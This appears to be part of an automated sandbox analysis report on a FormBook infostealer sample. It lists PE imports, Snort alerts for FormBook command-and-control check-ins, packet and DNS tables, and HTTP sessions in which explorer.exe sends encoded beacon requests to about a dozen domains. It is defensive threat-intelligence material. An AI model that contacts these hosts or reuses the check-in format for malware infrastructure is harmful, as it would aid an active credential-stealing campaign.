                                                                                                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              06/10/21-14:36:46.806513TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                                                                              06/10/21-14:36:46.806513TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                                                                              06/10/21-14:36:46.806513TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                                                                              06/10/21-14:36:46.947381TCP1201ATTACK-RESPONSES 403 Forbidden804974134.102.136.180192.168.2.3
                                                                                                              06/10/21-14:36:52.333303TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3157.245.232.77
                                                                                                              06/10/21-14:36:52.333303TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3157.245.232.77
                                                                                                              06/10/21-14:36:52.333303TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3157.245.232.77
                                                                                                              06/10/21-14:36:57.655557TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.323.227.38.74
                                                                                                              06/10/21-14:36:57.655557TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.323.227.38.74
                                                                                                              06/10/21-14:36:57.655557TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.323.227.38.74
                                                                                                              06/10/21-14:36:57.730741TCP1201ATTACK-RESPONSES 403 Forbidden804974423.227.38.74192.168.2.3
                                                                                                              06/10/21-14:37:18.660568TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.362.149.128.40
                                                                                                              06/10/21-14:37:18.660568TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.362.149.128.40
                                                                                                              06/10/21-14:37:18.660568TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.362.149.128.40
                                                                                                              06/10/21-14:37:34.273370TCP1201ATTACK-RESPONSES 403 Forbidden804975034.102.136.180192.168.2.3

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jun 10, 2021 14:36:41.414776087 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.542696953 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.542872906 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.543024063 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.670629025 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.674711943 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.674747944 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.674931049 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.675261974 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.802669048 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.763731956 CEST4974180192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:36:46.806230068 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.806391954 CEST4974180192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:36:46.806513071 CEST4974180192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:36:46.848884106 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.947381020 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.947462082 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.947693110 CEST4974180192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:36:46.992661953 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.134191990 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.332736015 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.333158970 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.333302975 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.531209946 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.531318903 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.531372070 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.531611919 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.531677008 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.729552984 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.611773014 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.655070066 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.655231953 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.655556917 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.697685003 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730741024 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730763912 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730776072 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730788946 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730799913 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730808020 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730911016 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730973005 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.731034040 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.731090069 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:37:18.590595007 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.660319090 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.660419941 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.660567999 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.730734110 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730801105 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730845928 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730884075 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730901003 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.731070042 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.731112957 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.800710917 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:28.911634922 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:28.963741064 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:28.963879108 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:28.964153051 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.016647100 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.018930912 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.018975019 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.019244909 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.019284010 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.071325064 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.093084097 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.135099888 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.135303020 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.135488033 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.177417040 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273370028 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273396015 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273545980 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.273617983 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.315685034 CEST804975034.102.136.180192.168.2.3

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jun 10, 2021 14:35:21.540608883 CEST5128153192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:21.600243092 CEST53512818.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:22.433522940 CEST4919953192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:22.503585100 CEST53491998.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:22.984400988 CEST5062053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:23.043394089 CEST53506208.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:24.092315912 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:24.148153067 CEST53649388.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:25.223495960 CEST6015253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:25.276424885 CEST53601528.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:26.553495884 CEST5754453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:26.597443104 CEST5598453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:26.603411913 CEST53575448.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:26.657538891 CEST53559848.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:27.724009991 CEST6418553192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:27.774061918 CEST53641858.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:28.972966909 CEST6511053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:29.026110888 CEST53651108.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:30.129262924 CEST5836153192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:30.179409981 CEST53583618.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:31.364945889 CEST6349253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:31.420346022 CEST53634928.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:32.636611938 CEST6083153192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:32.691618919 CEST53608318.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:34.212727070 CEST6010053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:34.267724037 CEST53601008.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:36.113869905 CEST5319553192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:36.163959980 CEST53531958.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:37.237287998 CEST5014153192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:37.287698984 CEST53501418.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:38.392787933 CEST5302353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:38.443218946 CEST53530238.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:39.536595106 CEST4956353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:39.586926937 CEST53495638.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:40.697844982 CEST5135253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:40.747873068 CEST53513528.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:42.170535088 CEST5934953192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:42.220783949 CEST53593498.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:43.288001060 CEST5708453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:43.338124990 CEST53570848.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:44.681548119 CEST5882353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:44.731674910 CEST53588238.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:46.385086060 CEST5756853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:46.443718910 CEST53575688.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:56.603996038 CEST5054053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:56.666836023 CEST53505408.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:01.849566936 CEST5436653192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:01.908924103 CEST53543668.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:17.098634958 CEST5303453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:17.161837101 CEST53530348.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:18.515304089 CEST5776253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:18.575824022 CEST53577628.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:36.123982906 CEST5543553192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:36.328604937 CEST53554358.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.350483894 CEST5071353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:41.411506891 CEST53507138.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:42.922017097 CEST5613253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:42.992693901 CEST53561328.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.694658995 CEST5898753192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:46.762590885 CEST53589878.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:49.087750912 CEST5657953192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:49.155028105 CEST53565798.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:51.983397007 CEST6063353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:52.132129908 CEST53606338.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.543658018 CEST6129253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:57.609603882 CEST53612928.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:02.747368097 CEST6361953192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:02.922837019 CEST53636198.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:13.404011965 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:13.486615896 CEST53649388.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:13.711085081 CEST6194653192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:13.780498028 CEST53619468.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:14.248370886 CEST6491053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:14.318262100 CEST53649108.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.494946957 CEST5212353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:18.588766098 CEST53521238.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:22.024542093 CEST5613053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:22.087380886 CEST53561308.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:23.745273113 CEST5633853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:23.804264069 CEST53563388.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:28.858174086 CEST5942053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:28.909409046 CEST53594208.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.027822971 CEST5878453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:34.091212988 CEST53587848.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:39.291151047 CEST6397853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:39.386704922 CEST53639788.8.8.8192.168.2.3

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Jun 10, 2021 14:36:36.123982906 CEST192.168.2.38.8.8.80x81c1Standard query (0)www.allyexpense.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:41.350483894 CEST192.168.2.38.8.8.80x183dStandard query (0)www.protectpursuit.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:46.694658995 CEST192.168.2.38.8.8.80xbcdeStandard query (0)www.freshdeliciousberryfarm.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:51.983397007 CEST192.168.2.38.8.8.80x6984Standard query (0)www.sw-advisers.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:57.543658018 CEST192.168.2.38.8.8.80xb6b6Standard query (0)www.goldgrandpa.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:02.747368097 CEST192.168.2.38.8.8.80xac4aStandard query (0)www.2dmaxximumrecords.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:13.404011965 CEST192.168.2.38.8.8.80x389aStandard query (0)www.oilleakgames.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:18.494946957 CEST192.168.2.38.8.8.80x5b1dStandard query (0)www.goldinsacks.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:23.745273113 CEST192.168.2.38.8.8.80xbbbaStandard query (0)www.goodlukc.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:28.858174086 CEST192.168.2.38.8.8.80x3010Standard query (0)www.growwithjenn.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:34.027822971 CEST192.168.2.38.8.8.80xfb9dStandard query (0)www.bring-wellness.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:39.291151047 CEST192.168.2.38.8.8.80x5366Standard query (0)www.topazsnacks.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Jun 10, 2021 14:36:36.328604937 CEST8.8.8.8192.168.2.30x81c1Server failure (2)www.allyexpense.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:41.411506891 CEST8.8.8.8192.168.2.30x183dNo error (0)www.protectpursuit.comprotectpursuit.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:41.411506891 CEST8.8.8.8192.168.2.30x183dNo error (0)protectpursuit.com165.22.38.5A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:46.762590885 CEST8.8.8.8192.168.2.30xbcdeNo error (0)www.freshdeliciousberryfarm.comfreshdeliciousberryfarm.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:46.762590885 CEST8.8.8.8192.168.2.30xbcdeNo error (0)freshdeliciousberryfarm.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:52.132129908 CEST8.8.8.8192.168.2.30x6984No error (0)www.sw-advisers.comsw-advisers.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:52.132129908 CEST8.8.8.8192.168.2.30x6984No error (0)sw-advisers.com157.245.232.77A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:57.609603882 CEST8.8.8.8192.168.2.30xb6b6No error (0)www.goldgrandpa.comyummymeatballs.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:57.609603882 CEST8.8.8.8192.168.2.30xb6b6No error (0)yummymeatballs.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:57.609603882 CEST8.8.8.8192.168.2.30xb6b6No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:02.922837019 CEST8.8.8.8192.168.2.30xac4aServer failure (2)www.2dmaxximumrecords.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:13.486615896 CEST8.8.8.8192.168.2.30x389aName error (3)www.oilleakgames.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:18.588766098 CEST8.8.8.8192.168.2.30x5b1dNo error (0)www.goldinsacks.com62.149.128.40A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:23.804264069 CEST8.8.8.8192.168.2.30xbbbaName error (3)www.goodlukc.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:28.909409046 CEST8.8.8.8192.168.2.30x3010No error (0)www.growwithjenn.comgrowwithjenn.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:28.909409046 CEST8.8.8.8192.168.2.30x3010No error (0)growwithjenn.com160.153.136.3A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:34.091212988 CEST8.8.8.8192.168.2.30xfb9dNo error (0)www.bring-wellness.combring-wellness.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:34.091212988 CEST8.8.8.8192.168.2.30xfb9dNo error (0)bring-wellness.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:39.386704922 CEST8.8.8.8192.168.2.30x5366No error (0)www.topazsnacks.comtopazsnacks.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:39.386704922 CEST8.8.8.8192.168.2.30x5366No error (0)topazsnacks.com135.181.180.74A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.protectpursuit.com
                                                                                                              • www.freshdeliciousberryfarm.com
                                                                                                              • www.sw-advisers.com
                                                                                                              • www.goldgrandpa.com
                                                                                                              • www.goldinsacks.com
                                                                                                              • www.growwithjenn.com
                                                                                                              • www.bring-wellness.com

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.349735165.22.38.580C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:36:41.543024063 CEST1430OUTGET /dp3a/?rTWxa=fFin23A3InOxv8Q1OZSqiWR/FjS3KuFpXPcC+roY+PuFOGx4uYNLJpybUr51Ny74Rks0&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
                                                                                                              Host: www.protectpursuit.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:36:41.674711943 CEST1430INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 10 Jun 2021 12:36:41 GMT
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Vary: Origin


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.34974134.102.136.18080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:36:46.806513071 CEST3358OUTGET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=DH0B3lUhAa5VBPw8nCCOXpLU24maY23yGmrt22qj0kvQjGAaKYYXdT0Mh/TRCK5k4cmX HTTP/1.1
                                                                                                              Host: www.freshdeliciousberryfarm.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:36:46.947381020 CEST3359INHTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Thu, 10 Jun 2021 12:36:46 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "60ba413e-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.2.349743157.245.232.7780C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:36:52.333302975 CEST3392OUTGET /dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
                                                                                                              Host: www.sw-advisers.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:36:52.531318903 CEST3393INHTTP/1.1 301 Moved Permanently
                                                                                                              Server: nginx
                                                                                                              Date: Thu, 10 Jun 2021 12:36:52 GMT
